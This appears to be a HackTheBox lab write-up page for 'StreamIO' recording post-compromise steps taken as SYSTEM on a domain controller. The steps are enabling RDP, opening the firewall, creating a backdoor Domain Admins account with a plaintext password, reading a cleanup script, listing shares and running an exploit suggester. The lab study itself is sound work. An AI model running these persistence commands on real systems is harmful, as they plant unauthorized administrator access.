InfoSec LAB

StreamIO_Beyond

Created: 4 min read

Beyond

This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM after compromising the target system

Prep

C:\Windows\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
 
C:\Windows\system32> netsh firewall add portopening TCP 3389 "Remote Desktop"
 
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.

Enabling RDP

C:\Windows\system32> NET user adm1n Qwer1234 /ADD /DOMAIN
The command completed successfully.
 
C:\Windows\system32> NET groups "Domain Admins" /DOMAIN /ADD adm1n
The command completed successfully.

dummy account

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ xfreerdp /u:adm1n /p:Qwer1234 /v:dc.streamio.htb /cert:ignore /dynamic-resolution /tls-seclevel:0

RDP

established

mmc

Scheduled Task

cleaning

cleaning

C:\Users\Administrator\Documents\clearing.bat

C:\Users\Administrator\Documents\clearing.bat

ps c:\Windows\system32> cat C:\Users\Administrator\Documents\clearing.bat
net group "CORE STAFF" nikk37 /del /dom
net group "CORE STAFF" yoshihide /del /dom
net group "CORE STAFF" JDgodd /del /dom
dsacls "CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb" -resetdefaultdacl
dsacls "cn=core staff,cn=users,dc=streamio,dc=htb" /g "streamio.htb\jdgodd:WO"

SMB

C:\Windows\system32> net share
 
Share name   Resource                                Remark
 
-------------------------------------------------------------------------------
C$           C:\                                     Default share                     
IPC$                                                 Remote IPC                        
ADMIN$       C:\Windows                              Remote Admin                      
NETLOGON     C:\Windows\SYSVOL\sysvol\streamIO.htb\SCRIPTS
                                                     Logon server share                
SYSVOL       C:\Windows\SYSVOL\sysvol                Logon server share                
The command completed successfully.

Web

MSSQL

Users and Groups

Core Staff

Vulnerabilities

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ wes --update ; wes sysinfo.txt -c --exploits-only --hide "Internet Explorer" Edge Flash -s critical           
windows exploit suggester 1.02 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20231110
windows exploit suggester 1.02 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - name: Windows Server 2019
    - generation: 2019
    - build: 17763
    - version: 1809
    - architecture: x64-based
    - installed hotfixes: None
[+] Loading definitions
    - creation date of definitions: 20231110
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[!] Found vulnerabilities!
 
date: 20200512
cve: CVE-2020-0646
kb: KB4535101
title: .NET Framework Remote Code Execution Injection Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
affected component: .NET Framework
severity: Critical
impact: Remote Code Execution
exploit: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
date: 20200512
cve: CVE-2020-0646
kb: KB4535101
title: .NET Framework Remote Code Execution Injection Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
affected component: .NET Framework
severity: Critical
impact: Remote Code Execution
exploit: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
date: 20200512
cve: CVE-2020-0646
kb: KB4535101
title: .NET Framework Remote Code Execution Injection Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
affected component: .NET Framework
severity: Critical
impact: Remote Code Execution
exploit: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
date: 20200512
cve: CVE-2020-0646
kb: KB4535101
title: .NET Framework Remote Code Execution Injection Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
affected component: .NET Framework
severity: Critical
impact: Remote Code Execution
exploit: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
date: 20200714
cve: CVE-2020-1147
kb: KB4578966
title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
affected component: Microsoft
severity: Critical
impact: Remote Code Execution
exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
 
date: 20200714
cve: CVE-2020-1147
kb: KB4578966
title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
affected component: Microsoft
severity: Critical
impact: Remote Code Execution
exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
 
date: 20200714
cve: CVE-2020-1147
kb: KB4578966
title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
affected component: Microsoft
severity: Critical
impact: Remote Code Execution
exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
 
date: 20200714
cve: CVE-2020-1147
kb: KB4578966
title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
affected component: Microsoft
severity: Critical
impact: Remote Code Execution
exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
 
[-] missing patches: 2
    - kb4535101: patches 4 vulnerabilities
    - kb4578966: patches 4 vulnerabilities
[I] KB with the most recent release date
    - id: KB4578966
    - release date: 20200714
[+] Done. Displaying 8 of the 761 vulnerabilities found.

Interactive Graph View

Backlinks